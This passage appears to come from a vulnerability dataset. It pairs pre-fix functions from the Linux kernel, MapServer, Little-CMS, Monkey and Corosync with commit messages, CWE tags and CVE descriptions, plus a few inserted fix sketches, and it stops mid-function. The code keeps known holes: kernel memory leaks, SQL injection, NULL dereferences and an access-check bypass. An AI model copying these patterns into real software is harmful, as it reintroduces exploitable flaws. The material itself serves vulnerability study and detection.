Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int nr_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_ax25 *sax = (struct sockaddr_ax25 *)msg->msg_name;
size_t copied;
struct sk_buff *skb;
int er;
/*
* This works for seqpacket too. The receiver has ordered the queue for
* us! We do one quick check first though
*/
lock_sock(sk);
if (sk->sk_state != TCP_ESTABLISHED) {
release_sock(sk);
return -ENOTCONN;
}
/* Now we can treat all alike */
if ((skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT, flags & MSG_DONTWAIT, &er)) == NULL) {
release_sock(sk);
return er;
}
skb_reset_transport_header(skb);
copied = skb->len;
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
er = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (er < 0) {
skb_free_datagram(sk, skb);
release_sock(sk);
return er;
}
if (sax != NULL) {
memset(sax, 0, sizeof(*sax));
sax->sax25_family = AF_NETROM;
skb_copy_from_linear_data_offset(skb, 7, sax->sax25_call.ax25_call,
AX25_ADDR_LEN);
}
msg->msg_namelen = sizeof(*sax);
skb_free_datagram(sk, skb);
release_sock(sk);
return copied;
}
| 122,095,893,171,554,320,000,000,000,000,000,000,000 | af_netrom.c | 227,993,719,544,841,100,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,381 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int packet_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t len, int flags)
{
struct sock *sk = sock->sk;
struct sk_buff *skb;
int copied, err;
struct sockaddr_ll *sll;
int vnet_hdr_len = 0;
err = -EINVAL;
if (flags & ~(MSG_PEEK|MSG_DONTWAIT|MSG_TRUNC|MSG_CMSG_COMPAT|MSG_ERRQUEUE))
goto out;
#if 0
/* What error should we return now? EUNATTACH? */
if (pkt_sk(sk)->ifindex < 0)
return -ENODEV;
#endif
if (flags & MSG_ERRQUEUE) {
err = sock_recv_errqueue(sk, msg, len,
SOL_PACKET, PACKET_TX_TIMESTAMP);
goto out;
}
/*
* Call the generic datagram receiver. This handles all sorts
* of horrible races and re-entrancy so we can forget about it
* in the protocol layers.
*
* Now it will return ENETDOWN, if the device has just gone down,
* but then it will block.
*/
skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &err);
/*
* An error occurred so return it. Because skb_recv_datagram()
* handles the blocking, we don't need to see or worry about
* blocking retries.
*/
if (skb == NULL)
goto out;
if (pkt_sk(sk)->has_vnet_hdr) {
struct virtio_net_hdr vnet_hdr = { 0 };
err = -EINVAL;
vnet_hdr_len = sizeof(vnet_hdr);
if (len < vnet_hdr_len)
goto out_free;
len -= vnet_hdr_len;
if (skb_is_gso(skb)) {
struct skb_shared_info *sinfo = skb_shinfo(skb);
/* This is a hint as to how much should be linear. */
vnet_hdr.hdr_len = skb_headlen(skb);
vnet_hdr.gso_size = sinfo->gso_size;
if (sinfo->gso_type & SKB_GSO_TCPV4)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_TCPV4;
else if (sinfo->gso_type & SKB_GSO_TCPV6)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_TCPV6;
else if (sinfo->gso_type & SKB_GSO_UDP)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_UDP;
else if (sinfo->gso_type & SKB_GSO_FCOE)
goto out_free;
else
BUG();
if (sinfo->gso_type & SKB_GSO_TCP_ECN)
vnet_hdr.gso_type |= VIRTIO_NET_HDR_GSO_ECN;
} else
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_NONE;
if (skb->ip_summed == CHECKSUM_PARTIAL) {
vnet_hdr.flags = VIRTIO_NET_HDR_F_NEEDS_CSUM;
vnet_hdr.csum_start = skb_checksum_start_offset(skb);
vnet_hdr.csum_offset = skb->csum_offset;
} else if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
vnet_hdr.flags = VIRTIO_NET_HDR_F_DATA_VALID;
} /* else everything is zero */
err = memcpy_toiovec(msg->msg_iov, (void *)&vnet_hdr,
vnet_hdr_len);
if (err < 0)
goto out_free;
}
/*
* If the address length field is there to be filled in, we fill
* it in now.
*/
sll = &PACKET_SKB_CB(skb)->sa.ll;
if (sock->type == SOCK_PACKET)
msg->msg_namelen = sizeof(struct sockaddr_pkt);
else
msg->msg_namelen = sll->sll_halen + offsetof(struct sockaddr_ll, sll_addr);
/*
* You lose any data beyond the buffer you gave. If it worries a
* user program they can ask the device for its MTU anyway.
*/
copied = skb->len;
if (copied > len) {
copied = len;
msg->msg_flags |= MSG_TRUNC;
}
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto out_free;
sock_recv_ts_and_drops(msg, sk, skb);
if (msg->msg_name)
memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa,
msg->msg_namelen);
if (pkt_sk(sk)->auxdata) {
struct tpacket_auxdata aux;
aux.tp_status = TP_STATUS_USER;
if (skb->ip_summed == CHECKSUM_PARTIAL)
aux.tp_status |= TP_STATUS_CSUMNOTREADY;
aux.tp_len = PACKET_SKB_CB(skb)->origlen;
aux.tp_snaplen = skb->len;
aux.tp_mac = 0;
aux.tp_net = skb_network_offset(skb);
if (vlan_tx_tag_present(skb)) {
aux.tp_vlan_tci = vlan_tx_tag_get(skb);
aux.tp_status |= TP_STATUS_VLAN_VALID;
} else {
aux.tp_vlan_tci = 0;
}
aux.tp_padding = 0;
put_cmsg(msg, SOL_PACKET, PACKET_AUXDATA, sizeof(aux), &aux);
}
/*
* Free or return the buffer as appropriate. Again this
* hides all the races and re-entrancy issues from us.
*/
err = vnet_hdr_len + ((flags&MSG_TRUNC) ? skb->len : copied);
out_free:
skb_free_datagram(sk, skb);
out:
return err;
}
| 264,606,051,361,135,500,000,000,000,000,000,000,000 | af_packet.c | 336,820,861,216,337,700,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
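For packet_recvmsg() the same series guards both the length computation and the copy on msg_name being non-NULL, instead of unconditionally setting msg_namelen from a possibly uninitialized sockaddr_ll. A close sketch of the fixed tail (exact statement ordering may differ from the upstream diff):

	if (msg->msg_name) {
		if (sock->type == SOCK_PACKET)
			msg->msg_namelen = sizeof(struct sockaddr_pkt);
		else {
			struct sockaddr_ll *sll = &PACKET_SKB_CB(skb)->sa.ll;
			msg->msg_namelen = sll->sll_halen +
				offsetof(struct sockaddr_ll, sll_addr);
		}
		memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa,
		       msg->msg_namelen);
	}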
1,394 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int x25_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size,
int flags)
{
struct sock *sk = sock->sk;
struct x25_sock *x25 = x25_sk(sk);
struct sockaddr_x25 *sx25 = (struct sockaddr_x25 *)msg->msg_name;
size_t copied;
int qbit, header_len;
struct sk_buff *skb;
unsigned char *asmptr;
int rc = -ENOTCONN;
lock_sock(sk);
if (x25->neighbour == NULL)
goto out;
header_len = x25->neighbour->extended ?
X25_EXT_MIN_LEN : X25_STD_MIN_LEN;
/*
* This works for seqpacket too. The receiver has ordered the queue for
* us! We do one quick check first though
*/
if (sk->sk_state != TCP_ESTABLISHED)
goto out;
if (flags & MSG_OOB) {
rc = -EINVAL;
if (sock_flag(sk, SOCK_URGINLINE) ||
!skb_peek(&x25->interrupt_in_queue))
goto out;
skb = skb_dequeue(&x25->interrupt_in_queue);
if (!pskb_may_pull(skb, X25_STD_MIN_LEN))
goto out_free_dgram;
skb_pull(skb, X25_STD_MIN_LEN);
/*
* No Q bit information on Interrupt data.
*/
if (test_bit(X25_Q_BIT_FLAG, &x25->flags)) {
asmptr = skb_push(skb, 1);
*asmptr = 0x00;
}
msg->msg_flags |= MSG_OOB;
} else {
/* Now we can treat all alike */
release_sock(sk);
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &rc);
lock_sock(sk);
if (!skb)
goto out;
if (!pskb_may_pull(skb, header_len))
goto out_free_dgram;
qbit = (skb->data[0] & X25_Q_BIT) == X25_Q_BIT;
skb_pull(skb, header_len);
if (test_bit(X25_Q_BIT_FLAG, &x25->flags)) {
asmptr = skb_push(skb, 1);
*asmptr = qbit;
}
}
skb_reset_transport_header(skb);
copied = skb->len;
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
/* Currently, each datagram always contains a complete record */
msg->msg_flags |= MSG_EOR;
rc = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (rc)
goto out_free_dgram;
if (sx25) {
sx25->sx25_family = AF_X25;
sx25->sx25_addr = x25->dest_addr;
}
msg->msg_namelen = sizeof(struct sockaddr_x25);
x25_check_rbuf(sk);
rc = copied;
out_free_dgram:
skb_free_datagram(sk, skb);
out:
release_sock(sk);
return rc;
}
| 87,996,953,335,419,640,000,000,000,000,000,000,000 | af_x25.c | 108,395,192,628,085,570,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
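x25_recvmsg() gets the same treatment: the msg_namelen assignment moves inside the sx25 NULL check, so a read()-style call (msg_name == NULL) reports no address length. Sketch:

	if (sx25) {
		sx25->sx25_family = AF_X25;
		sx25->sx25_addr   = x25->dest_addr;
		msg->msg_namelen  = sizeof(struct sockaddr_x25);
	}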
1,395 | mapserver | 3a10f6b829297dae63492a8c63385044bc6953ed | https://github.com/mapserver/mapserver | https://github.com/mapserver/mapserver/commit/3a10f6b829297dae63492a8c63385044bc6953ed | Fix potential SQL Injection with postgis TIME filters (#4834) | 1 | int msPostGISLayerSetTimeFilter(layerObj *lp, const char *timestring, const char *timefield)
{
char **atimes, **aranges = NULL;
int numtimes=0,i=0,numranges=0;
size_t buffer_size = 512;
char buffer[512], bufferTmp[512];
buffer[0] = '\0';
bufferTmp[0] = '\0';
if (!lp || !timestring || !timefield)
return MS_FALSE;
/* discrete time */
if (strstr(timestring, ",") == NULL &&
strstr(timestring, "/") == NULL) { /* discrete time */
createPostgresTimeCompareSimple(timefield, timestring, buffer, buffer_size);
} else {
/* multiple times, or ranges */
atimes = msStringSplit (timestring, ',', &numtimes);
if (atimes == NULL || numtimes < 1)
return MS_FALSE;
strlcat(buffer, "(", buffer_size);
for(i=0; i<numtimes; i++) {
if(i!=0) {
strlcat(buffer, " OR ", buffer_size);
}
strlcat(buffer, "(", buffer_size);
aranges = msStringSplit(atimes[i], '/', &numranges);
if(!aranges) return MS_FALSE;
if(numranges == 1) {
/* we don't have range, just a simple time */
createPostgresTimeCompareSimple(timefield, atimes[i], bufferTmp, buffer_size);
strlcat(buffer, bufferTmp, buffer_size);
} else if(numranges == 2) {
/* we have a range */
createPostgresTimeCompareRange(timefield, aranges[0], aranges[1], bufferTmp, buffer_size);
strlcat(buffer, bufferTmp, buffer_size);
} else {
return MS_FALSE;
}
msFreeCharArray(aranges, numranges);
strlcat(buffer, ")", buffer_size);
}
strlcat(buffer, ")", buffer_size);
msFreeCharArray(atimes, numtimes);
}
if(!*buffer) {
return MS_FALSE;
}
if(lp->filteritem) free(lp->filteritem);
lp->filteritem = msStrdup(timefield);
if (&lp->filter) {
/* if the filter is set and it's a string type, concatenate it with
the time. If not just free it */
if (lp->filter.type == MS_EXPRESSION) {
snprintf(bufferTmp, buffer_size, "(%s) and %s", lp->filter.string, buffer);
loadExpressionString(&lp->filter, bufferTmp);
} else {
freeExpression(&lp->filter);
loadExpressionString(&lp->filter, buffer);
}
}
return MS_TRUE;
}
| 92,160,701,703,090,280,000,000,000,000,000,000,000 | mappostgis.c | 273,968,548,871,858,860,000,000,000,000,000,000,000 | [
"CWE-89"
] | CVE-2013-7262 | SQL injection vulnerability in the msPostGISLayerSetTimeFilter function in mappostgis.c in MapServer before 6.4.1, when a WMS-Time service is used, allows remote attackers to execute arbitrary SQL commands via a crafted string in a PostGIS TIME filter. | https://nvd.nist.gov/vuln/detail/CVE-2013-7262 |
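The fix closes the injection by refusing time strings that could carry SQL metacharacters before they are spliced into the filter. The helper below is a hypothetical whitelist check (msIsSafeTimeString is not MapServer's actual API; the real patch may validate differently), shown only to illustrate the idea:

/* Hypothetical validator: accept only characters that can occur in
 * ISO-8601 time tokens plus the ',' and '/' list/range separators. */
static int msIsSafeTimeString(const char *s)
{
  static const char ok[] = "0123456789:.-TZz ,/";
  for (; *s != '\0'; s++) {
    if (strchr(ok, *s) == NULL)
      return MS_FALSE;
  }
  return MS_TRUE;
}

/* called at the top of msPostGISLayerSetTimeFilter(): */
if (!lp || !timestring || !timefield || !msIsSafeTimeString(timestring))
  return MS_FALSE;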
1,412 | Little-CMS | 91c2db7f2559be504211b283bc3a2c631d6f06d9 | https://github.com/mm2/Little-CMS | https://github.com/mm2/Little-CMS/commit/91c2db7f2559be504211b283bc3a2c631d6f06d9 | Non happy-path fixes | 1 | Curves16Data* CurvesAlloc(cmsContext ContextID, int nCurves, int nElements, cmsToneCurve** G)
{
int i, j;
Curves16Data* c16;
c16 = _cmsMallocZero(ContextID, sizeof(Curves16Data));
if (c16 == NULL) return NULL;
c16 ->nCurves = nCurves;
c16 ->nElements = nElements;
c16 ->Curves = _cmsCalloc(ContextID, nCurves, sizeof(cmsUInt16Number*));
if (c16 ->Curves == NULL) return NULL;
for (i=0; i < nCurves; i++) {
c16->Curves[i] = _cmsCalloc(ContextID, nElements, sizeof(cmsUInt16Number));
if (nElements == 256) {
for (j=0; j < nElements; j++) {
c16 ->Curves[i][j] = cmsEvalToneCurve16(G[i], FROM_8_TO_16(j));
}
}
else {
for (j=0; j < nElements; j++) {
c16 ->Curves[i][j] = cmsEvalToneCurve16(G[i], (cmsUInt16Number) j);
}
}
}
return c16;
}
| 147,209,237,771,980,330,000,000,000,000,000,000,000 | cmsopt.c | 290,419,189,479,580,550,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2013-4160 | Little CMS (lcms2) before 2.5, as used in OpenJDK 7 and possibly other products, allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via vectors related to (1) cmsStageAllocLabV2ToV4curves, (2) cmsPipelineDup, (3) cmsAllocProfileSequenceDescription, (4) CurvesAlloc, and (5) cmsnamed. | https://nvd.nist.gov/vuln/detail/CVE-2013-4160 |
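The "non happy-path" fix plugs the leaks and NULL dereferences above: the early return after allocating c16->Curves leaked c16, and each per-curve _cmsCalloc() result was used unchecked. A sketch of the hardened allocation loop (cleanup structure assumed; lcms2's actual patch may order it differently):

    c16->Curves = _cmsCalloc(ContextID, nCurves, sizeof(cmsUInt16Number*));
    if (c16->Curves == NULL) {
        _cmsFree(ContextID, c16);              /* previously leaked */
        return NULL;
    }

    for (i = 0; i < nCurves; i++) {
        c16->Curves[i] = _cmsCalloc(ContextID, nElements, sizeof(cmsUInt16Number));
        if (c16->Curves[i] == NULL) {          /* unwind the rows built so far */
            for (j = 0; j < i; j++)
                _cmsFree(ContextID, c16->Curves[j]);
            _cmsFree(ContextID, c16->Curves);
            _cmsFree(ContextID, c16);
            return NULL;
        }
        /* ... fill the curve as before ... */
    }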
1,413 | monkey | 15f72c1ee5e0afad20232bdf0fcecab8d62a5d89 | https://github.com/monkey/monkey | https://github.com/monkey/monkey/commit/15f72c1ee5e0afad20232bdf0fcecab8d62a5d89 | Mandril: check decoded URI (fix #92)
Signed-off-by: Eduardo Silva <eduardo@monkey.io> | 1 | int _mkp_stage_30(struct plugin *p,
struct client_session *cs,
struct session_request *sr)
{
mk_ptr_t referer;
(void) p;
(void) cs;
PLUGIN_TRACE("[FD %i] Mandril validating URL", cs->socket);
if (mk_security_check_url(sr->uri) < 0) {
PLUGIN_TRACE("[FD %i] Close connection, blocked URL", cs->socket);
mk_api->header_set_http_status(sr, MK_CLIENT_FORBIDDEN);
return MK_PLUGIN_RET_CLOSE_CONX;
}
PLUGIN_TRACE("[FD %d] Mandril validating hotlinking", cs->socket);
referer = mk_api->header_get(&sr->headers_toc, "Referer", strlen("Referer"));
if (mk_security_check_hotlink(sr->uri_processed, sr->host, referer) < 0) {
PLUGIN_TRACE("[FD %i] Close connection, deny hotlinking.", cs->socket);
mk_api->header_set_http_status(sr, MK_CLIENT_FORBIDDEN);
return MK_PLUGIN_RET_CLOSE_CONX;
}
return MK_PLUGIN_RET_NOT_ME;
}
| 131,927,884,398,444,160,000,000,000,000,000,000,000 | mandril.c | 309,060,299,715,844,330,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2013-2182 | The Mandril security plugin in Monkey HTTP Daemon (monkeyd) before 1.5.0 allows remote attackers to bypass access restrictions via a crafted URI, as demonstrated by an encoded forward slash. | https://nvd.nist.gov/vuln/detail/CVE-2013-2182 |
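Per the commit title ("check decoded URI"), the bypass exists because only the raw URI is validated while the request is ultimately resolved from the decoded one. A sketch of the fix, assuming sr->uri_processed holds the percent-decoded URI (as the hotlink check in this function suggests):

    /* validate both the raw and the decoded URI, so an encoded
     * "../" cannot slip past the block list */
    if (mk_security_check_url(sr->uri) < 0 ||
        mk_security_check_url(sr->uri_processed) < 0) {
        PLUGIN_TRACE("[FD %i] Close connection, blocked URL", cs->socket);
        mk_api->header_set_http_status(sr, MK_CLIENT_FORBIDDEN);
        return MK_PLUGIN_RET_CLOSE_CONX;
    }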
1,414 | corosync | b3f456a8ceefac6e9f2e9acc2ea0c159d412b595 | https://github.com/corosync/corosync | https://github.com/corosync/corosync/commit/b3f456a8ceefac6e9f2e9acc2ea0c159d412b595 | totemcrypto: fix hmac key initialization
Signed-off-by: Fabio M. Di Nitto <fdinitto@redhat.com>
Reviewed-by: Jan Friesse <jfriesse@redhat.com> | 1 | static int init_nss_hash(struct crypto_instance *instance)
{
PK11SlotInfo* hash_slot = NULL;
SECItem hash_param;
if (!hash_to_nss[instance->crypto_hash_type]) {
return 0;
}
hash_param.type = siBuffer;
hash_param.data = 0;
hash_param.len = 0;
hash_slot = PK11_GetBestSlot(hash_to_nss[instance->crypto_hash_type], NULL);
if (hash_slot == NULL) {
log_printf(instance->log_level_security, "Unable to find security slot (err %d)",
PR_GetError());
return -1;
}
instance->nss_sym_key_sign = PK11_ImportSymKey(hash_slot,
hash_to_nss[instance->crypto_hash_type],
PK11_OriginUnwrap, CKA_SIGN,
&hash_param, NULL);
if (instance->nss_sym_key_sign == NULL) {
log_printf(instance->log_level_security, "Failure to import key into NSS (err %d)",
PR_GetError());
return -1;
}
PK11_FreeSlot(hash_slot);
return 0;
}
| 114,430,622,650,469,530,000,000,000,000,000,000,000 | totemcrypto.c | 276,803,209,648,777,200,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2013-0250 | The init_nss_hash function in exec/totemcrypto.c in Corosync 2.0 before 2.3 does not properly initialize the HMAC key, which allows remote attackers to cause a denial of service (crash) via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2013-0250 |
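The bug is that hash_param describes a zero-length key, so every node ends up HMACing with an empty key and a crafted packet can defeat verification. The fix points the SECItem at the configured private key; the field names private_key/private_key_len are assumptions based on context, not quoted from the patch:

	hash_param.type = siBuffer;
	hash_param.data = instance->private_key;      /* real HMAC key material */
	hash_param.len  = instance->private_key_len;  /* instead of a 0-byte key */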
1,415 | linux | 3e10986d1d698140747fcfc2761ec9cb64c1d582 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/3e10986d1d698140747fcfc2761ec9cb64c1d582 | net: guard tcp_set_keepalive() to tcp sockets
Its possible to use RAW sockets to get a crash in
tcp_set_keepalive() / sk_reset_timer()
Fix is to make sure socket is a SOCK_STREAM one.
Reported-by: Dave Jones <davej@redhat.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int sock_setsockopt(struct socket *sock, int level, int optname,
char __user *optval, unsigned int optlen)
{
struct sock *sk = sock->sk;
int val;
int valbool;
struct linger ling;
int ret = 0;
/*
* Options without arguments
*/
if (optname == SO_BINDTODEVICE)
return sock_bindtodevice(sk, optval, optlen);
if (optlen < sizeof(int))
return -EINVAL;
if (get_user(val, (int __user *)optval))
return -EFAULT;
valbool = val ? 1 : 0;
lock_sock(sk);
switch (optname) {
case SO_DEBUG:
if (val && !capable(CAP_NET_ADMIN))
ret = -EACCES;
else
sock_valbool_flag(sk, SOCK_DBG, valbool);
break;
case SO_REUSEADDR:
sk->sk_reuse = (valbool ? SK_CAN_REUSE : SK_NO_REUSE);
break;
case SO_TYPE:
case SO_PROTOCOL:
case SO_DOMAIN:
case SO_ERROR:
ret = -ENOPROTOOPT;
break;
case SO_DONTROUTE:
sock_valbool_flag(sk, SOCK_LOCALROUTE, valbool);
break;
case SO_BROADCAST:
sock_valbool_flag(sk, SOCK_BROADCAST, valbool);
break;
case SO_SNDBUF:
/* Don't error on this; BSD doesn't, and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_wmem_max);
set_sndbuf:
sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
/* Wake up sending tasks if we upped the value. */
sk->sk_write_space(sk);
break;
case SO_SNDBUFFORCE:
if (!capable(CAP_NET_ADMIN)) {
ret = -EPERM;
break;
}
goto set_sndbuf;
case SO_RCVBUF:
/* Don't error on this; BSD doesn't, and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_rmem_max);
set_rcvbuf:
sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
/*
* We double it on the way in to account for
* "struct sk_buff" etc. overhead. Applications
* assume that the SO_RCVBUF setting they make will
* allow that much actual data to be received on that
* socket.
*
* Applications are unaware that "struct sk_buff" and
* other overheads allocate from the receive buffer
* during socket buffer allocation.
*
* And after considering the possible alternatives,
* returning the value we actually used in getsockopt
* is the most desirable behavior.
*/
sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
break;
case SO_RCVBUFFORCE:
if (!capable(CAP_NET_ADMIN)) {
ret = -EPERM;
break;
}
goto set_rcvbuf;
case SO_KEEPALIVE:
#ifdef CONFIG_INET
if (sk->sk_protocol == IPPROTO_TCP)
tcp_set_keepalive(sk, valbool);
#endif
sock_valbool_flag(sk, SOCK_KEEPOPEN, valbool);
break;
case SO_OOBINLINE:
sock_valbool_flag(sk, SOCK_URGINLINE, valbool);
break;
case SO_NO_CHECK:
sk->sk_no_check = valbool;
break;
case SO_PRIORITY:
if ((val >= 0 && val <= 6) || capable(CAP_NET_ADMIN))
sk->sk_priority = val;
else
ret = -EPERM;
break;
case SO_LINGER:
if (optlen < sizeof(ling)) {
ret = -EINVAL; /* 1003.1g */
break;
}
if (copy_from_user(&ling, optval, sizeof(ling))) {
ret = -EFAULT;
break;
}
if (!ling.l_onoff)
sock_reset_flag(sk, SOCK_LINGER);
else {
#if (BITS_PER_LONG == 32)
if ((unsigned int)ling.l_linger >= MAX_SCHEDULE_TIMEOUT/HZ)
sk->sk_lingertime = MAX_SCHEDULE_TIMEOUT;
else
#endif
sk->sk_lingertime = (unsigned int)ling.l_linger * HZ;
sock_set_flag(sk, SOCK_LINGER);
}
break;
case SO_BSDCOMPAT:
sock_warn_obsolete_bsdism("setsockopt");
break;
case SO_PASSCRED:
if (valbool)
set_bit(SOCK_PASSCRED, &sock->flags);
else
clear_bit(SOCK_PASSCRED, &sock->flags);
break;
case SO_TIMESTAMP:
case SO_TIMESTAMPNS:
if (valbool) {
if (optname == SO_TIMESTAMP)
sock_reset_flag(sk, SOCK_RCVTSTAMPNS);
else
sock_set_flag(sk, SOCK_RCVTSTAMPNS);
sock_set_flag(sk, SOCK_RCVTSTAMP);
sock_enable_timestamp(sk, SOCK_TIMESTAMP);
} else {
sock_reset_flag(sk, SOCK_RCVTSTAMP);
sock_reset_flag(sk, SOCK_RCVTSTAMPNS);
}
break;
case SO_TIMESTAMPING:
if (val & ~SOF_TIMESTAMPING_MASK) {
ret = -EINVAL;
break;
}
sock_valbool_flag(sk, SOCK_TIMESTAMPING_TX_HARDWARE,
val & SOF_TIMESTAMPING_TX_HARDWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_TX_SOFTWARE,
val & SOF_TIMESTAMPING_TX_SOFTWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_RX_HARDWARE,
val & SOF_TIMESTAMPING_RX_HARDWARE);
if (val & SOF_TIMESTAMPING_RX_SOFTWARE)
sock_enable_timestamp(sk,
SOCK_TIMESTAMPING_RX_SOFTWARE);
else
sock_disable_timestamp(sk,
(1UL << SOCK_TIMESTAMPING_RX_SOFTWARE));
sock_valbool_flag(sk, SOCK_TIMESTAMPING_SOFTWARE,
val & SOF_TIMESTAMPING_SOFTWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_SYS_HARDWARE,
val & SOF_TIMESTAMPING_SYS_HARDWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_RAW_HARDWARE,
val & SOF_TIMESTAMPING_RAW_HARDWARE);
break;
case SO_RCVLOWAT:
if (val < 0)
val = INT_MAX;
sk->sk_rcvlowat = val ? : 1;
break;
case SO_RCVTIMEO:
ret = sock_set_timeout(&sk->sk_rcvtimeo, optval, optlen);
break;
case SO_SNDTIMEO:
ret = sock_set_timeout(&sk->sk_sndtimeo, optval, optlen);
break;
case SO_ATTACH_FILTER:
ret = -EINVAL;
if (optlen == sizeof(struct sock_fprog)) {
struct sock_fprog fprog;
ret = -EFAULT;
if (copy_from_user(&fprog, optval, sizeof(fprog)))
break;
ret = sk_attach_filter(&fprog, sk);
}
break;
case SO_DETACH_FILTER:
ret = sk_detach_filter(sk);
break;
case SO_PASSSEC:
if (valbool)
set_bit(SOCK_PASSSEC, &sock->flags);
else
clear_bit(SOCK_PASSSEC, &sock->flags);
break;
case SO_MARK:
